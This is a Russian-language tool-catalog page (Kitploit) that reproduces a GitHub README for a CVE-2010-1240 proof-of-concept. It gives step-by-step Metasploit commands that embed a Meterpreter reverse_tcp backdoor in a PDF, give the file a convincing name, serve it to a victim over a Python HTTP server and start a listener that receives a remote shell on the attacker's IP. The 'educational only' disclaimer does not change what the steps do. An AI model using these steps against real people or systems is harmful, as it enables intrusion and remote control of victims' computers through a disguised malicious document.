Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2010-1240 — Образовательный proof-of-concept, демонстрирующий, как внедрить бэкдор Meterpreter в PDF-файл с использованием уязвимости CVE-2010-1240, с пошаговыми инструкциями по Metasploit для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/asepsaepdin/cve-2010-1240
Инструменты фишингаФреймворки для эксплойтовЭксплуатация веб-приложенийТестирование на ПроникновениеСоциальная инженерияРазработка Полезной Нагрузки
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Образовательный proof-of-concept, демонстрирующий, как внедрить бэкдор Meterpreter в PDF-файл с использованием уязвимости CVE-2010-1240, с пошаговыми инструкциями по Metasploit для авторизованного тестирования безопасности.

Репозиторий
11533 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2010-1240 - Внедрение бэкдора в PDF

Python


⚠️ Только для образовательных и авторизованных исследовательских целей в области безопасности

Описание

Adobe Reader и Acrobat 9.x до 9.3.3, а также 8.x до 8.2.3 в Windows и Mac OS X не ограничивают содержимое одного текстового поля в диалоговом окне предупреждения Launch File, что облегчает удаленным злоумышленникам обманом заставить пользователей выполнить произвольную локальную программу, указанную в PDF-документе, как показано на примере текстового поля, утверждающего, что кнопка Open позволит пользователю прочитать зашифрованное сообщение.

Демонстрация

Анимация

Пошаговые инструкции

  1. Сначала запустите msfconsole

    root@kitploit:~
    msfconsole
    
  2. Затем установите полезную нагрузку для внедрения в PDF

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. Установите параметр INFILENAME и укажите прямой путь к исходному PDF-файлу

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. Задайте имя новому вредоносному PDF-файлу, чтобы оно выглядело убедительнее, установив параметр FILENAME

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. Найдите и внедрите полезную нагрузку в PDF-файл

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. Установите параметр LHOST на IP-адрес атакующего

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. Откройте новый терминал и перейдите в папку с вредоносным PDF-файлом

    root@kitploit:~
    cd .msf4/local/
    
  8. Создайте временный сервер на Python

    root@kitploit:~
    python -m http.server
    
  9. Загрузите вредоносный PDF-файл на машину жертвы

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. Перед запуском вредоносного PDF-файла на машине жертвы запустите слушатель в предыдущем терминале

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Как только вредоносный PDF-файл будет выполнен на машине жертвы, вы получите подключение к машине жертвы

Благодарности

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Скачать инструмент